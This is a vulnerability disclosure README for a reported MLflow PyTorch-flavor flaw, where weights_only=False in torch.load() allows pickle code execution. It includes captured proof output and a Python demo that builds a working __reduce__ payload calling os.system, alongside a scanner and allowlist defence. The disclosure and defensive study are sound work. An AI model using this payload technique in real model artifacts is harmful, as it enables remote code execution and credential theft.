
MLflow F006 PyTorch weights_only=False Cloudpickle RCE

Payload repository for Huntr / ProtectAI triage.

Finding

MLflow's PyTorch flavor (_load_pyfunc()) hardcodes weights_only=False when it calls torch.load(), overriding the safer default that PyTorch 2.6+ applies and allowing a malicious model artifact to execute code (cloudpickle RCE) when it is loaded.

Primary PoC

proof_f006.py

Vulnerable Behavior

MLflow 3.12.0's PyTorch flavor explicitly passes:

weights_only=False

into torch.load() on PyTorch versions >= 2.6.0.

PyTorch 2.6 changed the default of torch.load() to weights_only=True, which restricts unpickling to an allowlist of tensor and container types instead of arbitrary Python objects. MLflow overrides that safer default and restores full-object pickle loading unless the user changes it.

Confirmed Behavior

Confirmed on:

MLflow: 3.12.0
Torch: 2.11.0+cpu
MLFLOW_ALLOW_PICKLE_DESERIALIZATION: True

The proof captures the actual torch.load() argument:

[CAPTURED_TORCH_LOAD] weights_only= False
weights_only_false_confirmed: true

The proof then confirms cloudpickle RCE:

marker_exists_after: True
marker_content: uid=0(root) gid=0(root) groups=0(root)
F006_CONFIRMED: MLflow passed weights_only=False and cloudpickle RCE executed under default config

The later error is expected and occurs after code execution:

AttributeError: 'int' object has no attribute 'eval'

The payload uses os.system(...), which returns the command's exit status as an integer. MLflow then tries to call .eval() on that integer, as it would on a loaded model object, but only after the command has already executed.
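The mechanics behind the captured weights_only= False line, as an added example written for this page (it is not code from proof_f006.py, from MLflow or from PyTorch): a constructed __reduce__ payload that references os.system, a static scan that lists the globals a pickle would import without executing it, and the two load paths side by side. The allowlisting unpickler is an assumed, minimal stand-in for what weights_only=True does, not torch's own allowlist; the zip member name archive/data.pkl, the marker file and the temp directory are constructed for the demonstration. It runs without torch installed.

```python
"""Added example: why weights_only=False matters, in pure Python (no torch)."""
import io
import os
import pickle
import pickletools
import tempfile
import zipfile

# Assumed stand-in for an allowlist of harmless globals; torch's real list differs.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class Payload:
    """Constructed malicious object: unpickling it calls os.system(), which the
    pickle records as a GLOBAL reference (posix.system on Linux, nt.system on Windows)."""

    def __init__(self, marker_path):
        self.marker_path = marker_path

    def __reduce__(self):
        # Same primitive the proof uses: os.system returns an int, not a model.
        return (os.system, (f"echo executed > {self.marker_path}",))


def build_payload(marker_path):
    # Protocol 2 matches torch.save()'s default; the scan handles any protocol.
    return pickle.dumps(Payload(marker_path), protocol=2)


def list_globals(data):
    """Static scan: every (module, name) the pickle would import, without running it."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":            # protocol <= 3: arg is "module name"
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":    # protocol 4+: module and name pushed as strings
            found.append((strings[-2], strings[-1]))
        elif op.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE", "STRING",
                         "SHORT_BINSTRING", "BINSTRING"):
            strings.append(arg)
    return found


def scan_checkpoint(path):
    """Scan a checkpoint before loading it: a raw pickle, or the zip container
    torch.save() writes (assumed layout: a data.pkl member inside the archive)."""
    if zipfile.is_zipfile(path):
        with zipfile.ZipFile(path) as zf:
            return [g for m in zf.namelist() if m.endswith("data.pkl")
                    for g in list_globals(zf.read(m))]
    with open(path, "rb") as f:
        return list_globals(f.read())


class AllowlistUnpickler(pickle.Unpickler):
    """Refuses any global outside ALLOWED_GLOBALS before it can be called."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def load_restricted(data):
    """Analogue of torch.load(weights_only=True)."""
    return AllowlistUnpickler(io.BytesIO(data)).load()


def load_full(data):
    """Analogue of torch.load(weights_only=False): plain pickle, runs the payload."""
    return pickle.loads(data)


def demo():
    """Build, scan, then try both load paths; returns the observations."""
    workdir = tempfile.mkdtemp()
    marker = os.path.join(workdir, "marker.txt")
    data = build_payload(marker)
    ckpt = os.path.join(workdir, "model.pth")
    with zipfile.ZipFile(ckpt, "w") as zf:     # constructed torch-style container
        zf.writestr("archive/data.pkl", data)
    result = {"globals": scan_checkpoint(ckpt)}
    try:
        load_restricted(data)
        result["blocked"] = False
    except pickle.UnpicklingError as exc:
        result["blocked"] = True
        result["reason"] = str(exc)
    result["marker_before"] = os.path.exists(marker)
    obj = load_full(data)                      # command runs here
    result["marker_after"] = os.path.exists(marker)
    result["loaded_type"] = type(obj).__name__  # int: the exit status, hence the .eval() error
    result["has_eval"] = hasattr(obj, "eval")
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The scan is the check worth running before any MLflow or torch load of an untrusted artifact: a checkpoint that only holds weights references tensor, storage and container types, so a posix.system, builtins.exec or subprocess.* entry in the list is disqualifying on its own.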

Why This Is Distinct

This is not merely "pickle is unsafe."

The distinct MLflow issue is that MLflow explicitly passes weights_only=False on modern PyTorch versions, where a caller that simply invoked torch.load() would get the safer default. That MLflow-side override re-enables unsafe object deserialization in the normal PyTorch flavor load path.

Key Evidence Files

proof_f006.py
RAW/proof_f006_stdout.txt
RAW/proof_f006_stderr.txt
RAW/proof_f006_exit_code.txt
SRC/source_references_f006.txt
SOURCE_REFERENCES.md
ENVIRONMENT.txt
COMMANDS.md
REQUESTS_RESPONSES.md
SHA256SUMS.txt

Scope

Confirmed against:

Repository: mlflow/mlflow
Version: MLflow 3.12.0
Torch: 2.11.0+cpu
Component: mlflow/pytorch/__init__.py
Primary APIs:
- mlflow.pytorch.load_model()
- MLflow PyTorch pyfunc loader path

Impact

An attacker who can supply or influence an MLflow PyTorch model artifact can execute arbitrary OS commands when the victim loads that model with MLflow's PyTorch flavor.

Potential impact includes:

execution as the MLflow process user
environment variable and secret theft
cloud credential theft
model artifact theft or tampering
model-serving or validation infrastructure compromise
CI/CD compromise

This repository intentionally contains only MLflow F006 PyTorch weights_only=False cloudpickle RCE artifacts.